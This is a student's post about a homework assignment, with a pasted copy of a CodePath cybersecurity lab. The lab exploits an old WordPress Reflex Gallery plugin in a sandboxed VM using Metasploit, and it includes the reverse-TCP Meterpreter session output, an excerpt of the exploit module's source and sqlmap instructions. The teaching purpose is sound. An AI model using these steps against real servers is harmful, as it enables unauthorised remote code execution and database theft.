Cyber Security: Kali Linux Lab
I have a Lab assignment that has to do with Kali Linux.
Youll have to watch 2 walkthrough videos:
The first video is regarding setting up Kali Linux
The second video is regarding setting up WordPress.
Once you successfully watch the two videos, you will then start the lab. The procedures of the lab are in the attachment section.
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 1/13
Last week, we started working with Vagrant and WPDistillery, running WordPress and Kali in separate VMs,
and using the wpscan tool to probe an older version of WordPress for weaknesses…and exploit them.
Hopefully, you were able to find some interesting exploits to understand how the types of vulnerabilities we
looked at over the first six weeks, such as XSS and SQLI, actually work in the wild.
This is only the beginning, though. As proofs-of-concept, many specific web vulnerabilities like XSS only
require a simple demonstration, such as a harmless javascript alert or some minor modification to an
HTML page. Like a single link in a chain, they aren’t very interesting in isolation, but when combined with
other links, these vulnerabilities can be wielded to great effect. Like martial arts students, we begin with the
rudiments — simple moves, both attacks and blocks — before we can understand how these are
combined into a repertoire of skills.
In practice, the offensive goal is usually achieving the highest level of access possible. The defensive goal
is, if not to block the attack outright, to at least contain the damage by limiting the attacker’s access.
Nobody plans for their user database to get stolen, but one still hashes and salts passwords anyway,
Week 8 Lab Exercises: WordPress vs. Kali,
Round 2
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 2/13
because pwning happens. This week, we’re going to look at how specific exploits become full-blown
attacks — and what can be done to stop them.
This week’s lab builds on the previous one in that we’ll be using the previous WP/Kali
setup via Vagrant/VirtualBox. We’ll cover some of the same steps again, but refer to last
week’s instructions if you need more of a refresher.
First, you’ll need to make sure you have the VirtualBox VMs setup in the same way as last week’s lab:
Running in VirtualBox
Logged into desktop
Provisioned via Vagrant / WPDistillery
Running version 4.2
If you are running a version other than 4.2 or if you break your WordPress server during an exploit, you can
destroy the current WP instance and remove web content:
Linux and macOS
cd $HOME/WPDistillery
vagrant destroy –force
Enter password for sudo if asked then delete WordPress content.
rm -rf public
Windows PowerShell (As Administrator)
cd $HOME\WPDistillery
vagrant destroy –force
Remove-Item -Recurse -Force .\public\
All Hosts
Edit wpdistillery/config.yml and change the following value:
# WordPress version
wpversion: 4.2
Start it back up.
vagrant up
Saving Progress: Whenever you need a break from hacking WordPress, you can gracefully shutdownWhenever you need a break from hacking WordPress, you can gracefully shutdown
the server usingthe server using vagrant halt . Whenever you wish to resume, use. Whenever you wish to resume, use vagrant up to start the server.to start the server.
Make sure you are in the WPDistillery directory when entering the commandsMake sure you are in the WPDistillery directory when entering the commands
(Hint:(Hint: cd $HOME/WPDistillery ).).
Milestone 0: Preparing the Playing Field
Kali VM
WordPress VM
https://courses.codepath.org/courses/cybersecurity_university/unit/7#!module
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 3/13
Before going further, shutdown the WordPress server usingBefore going further, shutdown the WordPress server using vagrant halt on the command line andon the command line and
shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.shutdown the Kali VM using either its own shutdown menu or through VirtualBox Manager.
There’s one more step required for this lab. Because VirtualBox places specific networking restrictions on
VMs, we need to configure VirtualBox to allow communication between the Kali VM and the WordPress VM
in order to execute a more sophisticated attack.
First, you need to determine the host-only adapter used by the WPDistillery VM. In the VirtualBox client,
click one the WPDistillery VM so its information is displayed in the detail pain, and then look at the details
under Network. Two adapters should be listed: one “NAT” and one “Host-Only Adapter” with a qualifier
like vboxnet0 — that is the host-only network in use, so make a note of it.
Next, you’ll need to setup a DHCP server for that network — this will allow automatic assignments of IP
addresses. Go to the Host Network Manager in VirtualBox (via the File menu). When the Host Network
Manager dialog comes up:
Bug Alerts: Deleting and re-creating the host-only adapter during step 1 (below) is necessary in orderDeleting and re-creating the host-only adapter during step 1 (below) is necessary in order
for Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in thefor Kali to pull an IP from the DHCP server later on. Otherwise DHCP will offer IPs in the
192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes192.168.56.0/24 network instead of 192.168.33.0/24. On macOS you may have to re-apply changes
twice when setting up DHCP, double-check the numbers before closing the dialog.twice when setting up DHCP, double-check the numbers before closing the dialog.
1. Highlight the host-only network you indentified in the previous step and delete it and then re-create it,
then click on the Properties button at the top of the dialog.
2. When the nested dialog appears, click on DHCP Server tab and set the following fields:
☑ Enable Server
Server Address: 192.168.33.2
Server Mask: 255.255.255.0
Lower Address Bound: 192.168.33.100
Upper Address Bound: 192.168.33.200
Click Apply and Close to apply these changes and exit. Restart the WPDistillery VM using the command
line ( vagrant up ) and confirm the WordPress site is still accessible via wpdistillery.vm .
Now, back in the VirtualBox client, click on the Kali VM. If it is running, power it down (right-click on the
VM, Close >> Power Off). Then in the Kali VM settings (right-click on the VM, Settings), add
a second adapter pointing to the same host-only network:
1. Click on Network
2. Click on Adapter 2 and set the following fields:
☑ Enable Network Adapter
Attached to: Host-only Adapter
Name: specify the host-only adapter modified in the previous step
3. Click OK
4. Start the Kali VM (right-click on the VM, Start >> Normal Start)
5. Open a terminal and run the following command to remove the default network profiles and reboot Kali
In Kali Terminal, run: sudo rm /etc/NetworkManager/system-connections/* ; sudo reboot
Open a Hole
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 4/13
6. After Kali reboots, log back in and confirm that you have 3 interfaces output in Kali Terminal by opening
a Terminal and running ip addr :
lo (loopback) with IP address of 127.0.0.1
eth0 (NAT) with IP similar to 10.x.x.x
eth1 (Host-only) with IP of 192.168.33.100
7. Verify connectivity to your WordPress server and the Internet from Kali.
ping google.com
ping wpdistillery.vm or ping 192.168.33.10
End the pings with Ctrl + C
If the setup was successful, both Kali and WordPress should have access to 2 networks now. One is used
for Internet access in order to facilitate downloading of WordPress plugins and Kali attack tools. The other
network doesn’t have Internet access, but is only a network of the VM’s that are connected to it. This latter
network is the one that’ll be used as a safe sandbox for practicing our exploits.
Our first victim is a WordPress plugin for displaying image galleries called Reflex Gallery.
1. In the WP admin console, go to Plugins -> Add New
2. Search for reflex gallery and you should see ReFlex Gallery » WordPress Photo Gallery
3. Click on the result but don’t install the plugin yet. Look at the Changelog tab for any critical security
issues that were patched and install the version just before it was patched.
4. On the right side of the dialog, where it lists the compatibility and installs data, click the WordPress.org
Plugin Page » link
5. You’ll be taken to the official WP plugin page. Click on the Development tab
6. Click Advanced View
7. Under Previous Versions, download the 3.1.3 zip file
8. In the WordPress admin console, go to Plugins -> Add New -> Upload Plugin, specify the zip file you
downloaded, then click Install Now
9. Go to admin console plugins page, find the plugin, and click Activate
Challenge: Beyond activating the plugin, you need to use it in a page or a post on the WP instance. Create
a gallery and use it in a page before proceeding
Milestone 1: Opening an Attack Surface
http://wpdistillery.vm/wp-admin/plugin-install.php
https://downloads.wordpress.org/plugin/reflex-gallery.3.1.3.zip
http://wpdistillery.vm/wp-admin/plugin-install.php?tab=upload
http://wpdistillery.vm/wp-admin/plugins.php
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 5/13
The following steps should be run in the Kali VM’s Terminal emulator
So we know the blog is accessible from the host OS and Kali VM at wpdistillery.vm , which is simply a
local IP aliased via the /etc/hosts file. Let’s re-run wpscan against the URL:
wpscan –url http://wpdistillery.vm –random-agent
The output should include the vulnerability associated with Reflex Gallery:
Arbitrary File Upload. Sounds promising. At this point, we could dig in, research the source code, come up
with a carefully-crafted demonstration of the specific, underlying exploit. But instead of that, let’s just go
right for the throat and attack this with a sledgehammer.
Metasploit is an exploitation framework. One of the most popular tools in Kali, it’s the free part of a larger,
commercial project used widely in web security penetration testing. And by hackers. If wpscan is a dental
pick, Metasploit is a set of carving knives.
Metasploit currently has over 1600 exploits, organized in different categories like:
Browser-based: a large collection of (mostly) remote code execution exploits
Mobile: Android, iOS
OS-specific: Linux, Windows, Solaris, etc.
Combinations of the above
Metasploit currently has hundreds of payloads. Some of them are:
Command shells, enabling attackers to run scripts or arbitrary commands against a host
Meterpreter payloads, enabling attackers to control the screen of a device using VNC and to browse,
upload and download files
Dynamic payloads, enabling attackers to evade anti-virus defenses by generating unique payloads
For this attack, we’ll be using Meterpreter to open a shell into the target machine. Read more about
Meterpreter here
Metasploit uses a database to manage exploit/payload information and also attack data. So you need to
initialize the DB, then load the console:
sudo service postgresql start
sudo msfdb init
msfconsole
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload Reference: https://wpvulndb.com/vulnerabilities/7867 Reference: http://packetstormsecurity.com/files/130845/ Reference: http://packetstormsecurity.com/files/131515/ Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133 Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_ Reference: https://www.exploit-db.com/exploits/36374/ [i] Fixed in: 3.1.4
Milestone 2: Recon
Milestone 3: Hello, Metasploit
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 6/13
Fun fact: you get different ASCII art every time. And they say hackers don’t care about UX. Note the
command prompt has changed to msf5 > . You are now in a shell within another shell within a VM.
In the snippets below, the > character denotes the end of the prompt (similar to
how $ is used to denote a non-root user’s bash prompt). For example, msf5 > is the
MSF prompt. The commands to enter will follow the > in most of the examples below.
First check that the DB is connected OK. The DB isn’t strictly necessary but MSF runs faster with it.
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
Now we’re ready.
In MSF, start by searching the exploit database for something related to the plugin affected by the
vulnerability. You could search on several different terms to find something, but in this case, the plugin has
an unusual word in its name, “Reflex”
Enter search Reflex into MSF:
Well, that sure looks handy. It’s even ranked excellent, which should suggest to you that not all of these
tools are created equal. Some work better than others; some don’t work at all. In fact, what follows may not
work perfectly for you, so don’t be too surprised if it doesn’t go swimmingly. These are hacks, after all: user-
supported code and scripts whose primary purpose is to compromise systems, so robustness isn’t exactly
a guarantee. Give it a shot, but be prepared for some possible difficulty ahead.
The command to use the exploit is unsurprisingly called use and takes the exploit’s name as an
argument. Once loaded, the command prompt changes again, and you can run the info command.
msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(wp_reflexgallery_file_upload) > info
Notice the output lists the affected version and some options we’ll need to set:
msf5 > search Reflex
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Descriptio
—- ————— —- ———–
exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent WordPress
Milestone 4: Pwnage
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 7/13
Use the set command to specify RHOST accordingly. If your blog isn’t hosted at the root ( / ), you
could additionally pass in the path by setting TARGETURI (but the WpDistillery setup should work with the
default).
msf5 exploit(wp_reflexgallery_file_upload) > set RHOST wpdistillery.vm
RHOST => wpdistillery.vm
Before we can run the exploit, we need to specify the LHOST i.e. which IP address should Kali (localhost)
receive a shell on. The default might be in the NAT network in which cause the exploit will work but no
session will be opened. To ensure that we get a shell back on the host-only adapter’s IP address, we will set
it explicitly.
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.33.100
LHOST => 192.168.33.100
You can probably guess the command used to finally run the exploit (it’ll take a minute to run):
Available targets:
Id Name
— —-
0 Reflex Gallery 3.1.3
Check supported:
Yes
Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:p
RHOSTS yes The target host(s), range CIDR identifier, or hosts
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits an arbitrary PHP code upload in the WordPress
Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary
file upload and remote code execution.
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit
[*] Started reverse TCP handler on 192.168.33.100:4444
[+] Our payload is at: mcxgHJixsWZpS.php. Calling payload…
[*] Calling payload…
[*] Sending stage (38288 bytes) to 192.168.33.10
[*] Meterpreter session 1 opened (192.168.33.100:4444 -> 192.168.33.10:51778) at 2020-10-11
[+] Deleted mcxgHJixsWZpS.php
meterpreter >
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 8/13
Having problems? See the Troubleshooting section at the end of this milestone
Notice the command prompt changed to meterpreter > . The meterpreter payload
( mcxgHJixsWZpS.php ) was uploaded, executed, then deleted (just like campers, hackers should leave no
trace), and now we have a connection to the target machine. Run the shell command when you see
the meterpreter > prompt to load a new shell:
meterpreter > shell
Process 5315 created.
Channel 0 created.
A shell within a shell within a shell. But this shell is different; this shell is running on the WordPress VM. In
case it’s not clear, you really shouldn’t be able to do that. Notice the new shell spawned by Meterpreter
doesn’t bother with command prompts at all, so it might just look like nothing’s happening after the process
and channel are created. Try running some commands, like whoami and pwd :
whoami
www-data
pwd
/var/www/public/wp-content/uploads/2020/10
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
exit
meterpreter >
Lines 2, 4, and 6 in above snippet are output. It’s a low-fi shell, and somewhat limited, but it works, and it’s
enough to compromise the whole machine. We can see we’re shell’d in as the www-data user and
presently in one of the wordpress upload directories, which is where the malicious PHP payload was
delivered.
The exit command on line 7 above gets us back to the meterpreter > prompt, which has fewer but
more useable commands than the shell. For instance, we can poke around with pwd , cd , ls ,
and cat :
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 9/13
meterpreter > pwd
/var/www/html/wp-content/uploads/2017/03
meterpreter > cd ../../..
meterpreter > pwd
/var/www/html/wp-content
meterpreter > ls
Listing: /var/www/html/wp-content
=================================
Mode Size Type Last modified Name
—- —- —- ————- —-
100644/rw-r–r– 29 fil 2017-03-18 19:01:59 +0000 index.php
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 plugins
40755/rwxr-xr-x 4096 dir 2017-03-16 20:06:21 +0000 themes
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 upgrade
40755/rwxr-xr-x 4096 dir 2017-03-18 01:13:31 +0000 uploads
meterpreter > cat index.php
Meterpreter may fail to establish a connection after running exploit in Metasploit. This might be a one-
off error, but if you can’t get it to work, here are a few alternatives you can try:
The whole setup can be simplified by bypassing the Kali VM and simply installing Metasploit to your host
machine and running the same instructions from within Metasploit on your host machine. We don’t
recommend this approach unless the above doesn’t work for you, for the simple reason that it’s not a great
idea to install hacking tools on to your host system. By having things like Metasploit and vulnerable
WordPress versions contained within VMs, any risks can be compartmentalized and easily cleaned up. That
said, there’s nothing especially dangerous about installing Metasploit to your host system, but if you do
install it, we’d recommend you remove it after the course is done.
As an alternative workaround to the above that still uses the Kali VM, you can setup port-forwarding through
localhost. In VirtualBox, stop your Kali VM, open its Settings, and under Network, disable Adapter 2 (as
created in Milestone 0), then switch back to Adapter 1 and click Port Forwarding. Click the Add button at
right and use the following settings:
Name: metasploit
Protocol: TCP
Host IP: 127.0.0.1
Host Port: 4444
Guest IP: (leave blank)
Guest Port: 4444
Click OK and retstart Kali. Then, in Metasploit, load the exploit (via use ), set LHOST to your host PC’s IP
address (not the VM IP) and LPORT to 4444 , then try exploit again.
Troubleshooting
Milestone 5: Tag it
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 10/13
Challenge: Make a change to the WP content. You can open a vi editor from meterpreter > using
the edit
example:
Meterpreter Cheat Sheet
And that’s pretty much game over for this scenario. Once an attacker is able to gain this level of access, a
whole universe of options suddenly opens up. If the machine is configured appropriately, those options may
be limited, but this is not a position any sysadmin wants be in, even with everything configured perfectly. In
the best case scenario, the attack surface available to the intruder is intolerably large.
Congratulations: at this point, you are officially a script kiddie. Hopefully this has given you a sense of the
power of these tools, how even a single, specific exploit affecting some random plugin can be weaponized
in a way that’s frighteningly easy to use. In the above example, we just compromised the whole system, so
it’s tempting to feel like there’s some real skill involved in what we’re doing here. But we’re standing on the
shoulders of giants. Just go back and read more about Meterpreter:
“…an advanced, dynamically extensible payload that uses in-memory DLL injection
stagers and is extended over the network at runtime. It communicates over the stager
socket and provides a comprehensive client-side Ruby API. It features command
history, tab completion, channels, and more.”
Now writing something like that takes real skill. Remember, everything available in Kali has been used
extensively by others. Many of these kinds of tools started out as someone’s secret weapon of choice and
gradually filtered out into the public domain. That’s not to say Kali isn’t powerful or even dangerous (it is).
But the most effective, advanced attacks and tools in use today certainly aren’t bundled in Kali.
Nobody wants to be a script kiddie, and, sadly, in-memory DLL injection is beyond the scope of our skills at
this point, but we can at least look at the exploit we just used and understand it. The link to the
announcement and code for this exploit is actually listed as part of the wpscan output from Milestone 2
(rapid7 is the company that sells the commercial version of Metasploit). From there, you can get to the code
for this exploit in Github. It’s written in Ruby. Don’t know Ruby? Doesn’t matter. Let’s look anyway:
Badge Earned: Script Kiddie
Milestone 6: Going Deeper
https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/
https://en.wikipedia.org/wiki/Script_kiddie
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 11/13
require ‘msf/core’
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Exploit::FileDropper
This is the class declaration of the module and associated require / include statements pulling in
the required parts of MSF. Lines 11 and 12 show the payload and its delivery mechanism are just
components of MSF.
Line 47 shows how the filename of the dropped payload is created randomly, and lines 49 – 51 show how
the MIME attachment is created and how the encoded payload is added to it as a binary data stream,
which is serialized as a string for the POST request.
And here’s the multipart upload POST request, which just mimics what the browser sends to the
WordPress server when the user uploads a file. The plugin accepts the binary content just as it would for an
image. Note the uri value contains the components of the path to the vulnerable source in the plugin.
if res.code == 200 && res.body =~ /success|#{php_pagename}/
print_good(“Our payload is at: #{php_pagename}. Calling payload…”)
register_files_for_cleanup(php_pagename)
If the response code is OK, the module marks the uploaded file for cleanup, which happens
immediately after the next step. The payload is deleted so obvious forensic evidence of the hack isn’t left on
the target server.
Finally, the payload is activated via another HTTP request, which opens the Meterpreter connection.
def exploit
php_pagename = rand_text_alpha(8 + rand(8)) + ‘.php’
data = Rex::MIME::Message.new
data.add_part(payload.encoded, ‘application/octet-stream’, nil, “form-data; name=\”qqfi
post_data = data.to_s
res = send_request_cgi({
‘uri’ => normalize_uri(wordpress_url_plugins, ‘reflex-gallery’, ‘admin’, ‘script
‘method’ => ‘POST’,
‘vars_get’ => {
‘Year’ => “#{year}”,
‘Month’ => “#{month}”
},
‘ctype’ => “multipart/form-data; boundary=#{data.bound}”,
‘data’ => post_data
})
send_request_cgi(
‘uri’ => normalize_uri(wordpress_url_wp_content, ‘uploads’, “#{year}”, “#{month
)
https://kb.iu.edu/d/agtj
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 12/13
One takeaway from this is that the framework, MSF, is doing all the heavy lifting here: the payload is
provided (even in encoded form), activating it is a single function call, and even the cleanup is provided as a
core function. All the author had to do here was create and issue a multipart POST request.
Challenge: Now that we’ve walked through the exploit, go back to the Reflex Gallery plugin code and
identify the fix — specifically, what was changed in the plugin code to prevent this attack?
Hints:
The plugin is written in PHP and Javascript — which part would this fix need be in, and why?
Use the source browser changelog viewer to diff specific commits
If you ran the MSF exploit agains the fixed version of the plugin, what specifically would fail?
Two files related to the vulnerability were substantially changed between the two versions
If you think back to all of the Security Shepherd exercises around SQL injection, you probably noticed that
finding the right combination of characters and expressions to use would very often boil down to trial and
error, educated guesswork, and sometimes dumb luck. Being a coder, you may have thought it’d be nice to
have a tool that automates all that guessing and testing. Say hello to our little friend sqlmap , which does
exactly that: given a URL and a parameter string, this tool will attempt to identify SQLI-vulnerable
parameters by systematically trying various SQLI exploits — pretty much all of them — and if it finds the right
way in, it can exfiltrate an entire database.
As such, one of the tricks to using sqlmap is knowing how not to use it. In the wrong hands, it becomes
an accidental load-testing tool, firing off thousands of requests from multiple threads and crashing a
database. In the right hands, it can identify novel routes for exploitation.
Read the usage docs on this one. In addition to the standard parameters, make sure you
understand threads , risk , and level that allow throttling and control how aggressively the tool will
run. Try different verbosity settings to see what it’s actually doing under the hood.
Challenge: Examine this writeup about a recent SQLI vulnerability in a WP plugin. Follow the same process
as before to identify the affected version from the changelog, install it manually, then recreate the exploit
described in the writeup using sqlmap and confirm the researcher’s results.
Hints:
Actually read the usage docs
Expect issues, be patient. sqlmap is basically hammering your WP VM, which isn’t designed to
handle a heavy load.
Look at the output carefully, even if there’s an error. Does it match the original findings?
To see what it’s doing, try running with high verbosity ( -vvvv ).
Try CTRL-C and (S)skip if something seems to hangs
When in doubt, accept the default.
Milestone 7: Hello, sqlmap
https://plugins.trac.wordpress.org/log/reflex-gallery/
https://github.com/sqlmapproject/sqlmap/wiki/Usage
https://packetstormsecurity.com/files/139921/WordPress-Olimometer-2.56-SQL-Injection.html
https://github.com/sqlmapproject/sqlmap/wiki/Usage
11/2/2020 Lab: Unit 8 – Cybersecurity University | CodePath Courses
https://courses.codepath.org/courses/cybersecurity_university/unit/8#!exercises 13/13